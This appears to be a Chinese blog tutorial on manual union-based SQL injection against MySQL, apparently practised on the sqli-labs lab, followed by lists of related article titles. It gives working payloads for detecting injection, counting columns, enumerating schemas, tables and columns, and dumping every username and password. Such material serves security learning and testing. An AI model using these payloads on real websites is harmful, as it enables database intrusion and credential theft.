判断是否存在注入

  • and 1=1 / and 1=2 回显页面不同(整形判断)

    输入and 1=1和and 1=2后发现页面没有变化,判断不是整型注入
    输入’ and 1=1 %23和 ’ and 1=2%23后发现页面变化,判断为字符注入
    在数据库中 1=1 和1=2 后面随便输入字符串(相当于1=1和1=2后面的查询语句),发现select 1="1dasd"时返回1正确,1="2dasd"时返回0错误,即select在查询时忽略后面的字符串,只让1和后面第一个数字对比,如果相等就是正确,不相等返回错误。

  • 单引号判断‘ 显示数据库错误信息或者页面回显不同(整形,字符串类型判断)

判断有多少列

  • order by n

    order by 函数是对MySQL中查询结果按照指定字段名进行排序,除了指定字 段名还可以指定字段的栏位进行排序,第一个查询字段为1,第二个为2,依次 类推。我们可以通过二分法来猜解列数

判断数据显示点

  • union select 1,2,3, N

    UNION的作用是将两个select查询结果合并
    程序在展示数据的时候通常只会取结果集的第一行数据,只要让第一行查询的结果是空集,即union左边的select子句查询结果为空,那么union右边的查询结果自然就成为了第一行,打印在网页上了

查看数据库基本信息

  • 获取所有数据库名:group_concat()一次性显示:

    select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA

  • 显示当前数据库:

    union select 1,version(),database()

  • 获取表名

    union select 1,2,group_concat(table_name) from information_schema.tables where table_schema= ‘security’

  • 获取列名

    union select 1,2,group_concat(column_name) from information_schema.columns where table_name= ‘users’

  • 查看账号密码信息

    union select 1,2,group_concat(username),group_concat(password)from users

  • 获取列中的信息

    select * from yourtablename limit 2,4;

SQL注入手工注入常用的语句相关推荐

  1. MSSQL注入手工注入mssql提权

    mssql数据库 mssql数据库相比mysql数据库本质上的框架是差不多的,使用的增,删,改,查命令是互相通的,mysql中使用的函数在mssql中有些会起不到作用点. MSSQL数据库的基本知识 ...

  2. SQL server手工注入入门

    安全库:http://www.seclibs.com/ 网络安全爱好者的安全导航,专注收集信安.红队常用网站.工具和技术博客 目录 0x01 SQL server基础 0x02 基本注入 SQL se ...

  3. 全网最全的SQL手工注入总结!(收藏这篇就够了!)

    虽说目前互联网上已经有很多关于 sql 注入的神器了,但是在这个 WAF 横行的时代,手工注入往往在一些真实环境中会显得尤为重要.本文主要把以前学过的知识做个总结,不会有详细的知识解读,类似于查询手册 ...

  4. PHP+MySQL手工注入

    1.发现注入点: 202.1.160.100/xycms/showproducts.php?id=12 and 1=1 202.1.160.100/xycms/showproducts.php?id= ...

  5. concat mysql sql注入_sql注入-mysql注入基础及常用注入语句

    最近在教学中,关于SQL注入,总发现学生理解起来有些难度,其实主要的原因是对各类数据库以及SQL语句不熟悉,今天先介绍mysql注入需要掌握的基础, Mysql内置information_schema ...

  6. Oracle数据库注入-墨者学院(SQL手工注入漏洞测试(Oracle数据库))

    本期来为大家讲解的sql注入题目是来墨者学院的SQL手工注入漏洞测试(Oracle数据库). 地址:http://124.70.22.208:42948/new_list.php?id=1(注意地址已 ...

  7. SQL手工注入原理(含环境搭建) ─=≡Σ(((つ•̀ω•́)つ 知己知彼百战百胜 web安全

    文章目录 SQL测试环境环境搭建 下载与安装环境 开启与使用环境 sqli-labs环境部署 dvwa环境部署 SQL手动注入 SQL注入原理 SQL注入分类 SQL注入手段 寻找注点 利用注点 ge ...

  8. 墨者靶场-SQL手工注入漏洞测试(MySQL数据库-字符型)

    0x00 前言 我们都知道,SQL注入分数字型和字符型,我们上次讲的是最基本的数字型SQL注入,这次我们就来讲最基本的字符型SQL注入.同样,如果是明白原理和方法的话,看懂这篇文章并不难,但是如果不清 ...

  9. SQL注入题型(手工注入+sqlmap)

    题目:通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件 目录 题目:通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件 首先进行手工注入(用'以及and或者or来进行查看 ...

最新文章

  1. 好物推荐 | 轻薄神器,妈妈再也不用担心我的颈椎了
  2. 07- Firmware Update (FWU)
  3. Spring整合Hibernate
  4. video camera in shanghai
  5. 员工转正申请书_员工有了归属感 企业实现大发展!通机股份在党工共建中摸索经验...
  6. NLP, 知识图谱参考资源
  7. 网络安全06_安装Windows XP_几个虚拟机能够相互ping通,并且能够ping通互联网114.114.114.114
  8. java8新特性_JAVA8十大新特性详解
  9. ZZULOJ 1056:幸运数字
  10. 基于theano的keras安装
  11. java中typeof_JS typeof的用法
  12. js 回调函数 精析
  13. 30年前的中专相当于现在什么学历?比现在一本厉害吗?
  14. c语言包含数学库函数的头文件为,Cmath——C语言数学函数库
  15. 图像处理的边缘和纹理的区别
  16. stm32mp157开发板MIC 接口测试方法
  17. 【加密与解密】C#如何读取pem的KEY文件
  18. 【linux命令】linux命令笔记
  19. MSSQL数据导入导出Excel的相关代码
  20. HBase中RegionServer宕机恢复介绍

热门文章

  1. 液冷模块是什么?有什么作用与意义?
  2. java 对外提供接口_Java服务器对外提供接口以及Android端向服务器请求数据
  3. NLP:NLP领域没有最强,只有更强的模型——GPT-3的简介、安装、使用方法之详细攻略
  4. Py之pixellib:pixellib库的简介、安装、经典案例之详细攻略
  5. Interview:算法岗位面试—11.07早上上海某机器人公司(上市)面试之项目考察、比赛考察、图像算法的考察等
  6. 成功解决pandas\core\frame.py:2754: SettingWithCopyWarning: A value is trying to be set on a copy of a s
  7. os_mbox.c(全)
  8. Python访问MySQL
  9. RocketMQ学习笔记(7)----RocketMQ的整体架构
  10. IntelliJ IDEA使用说明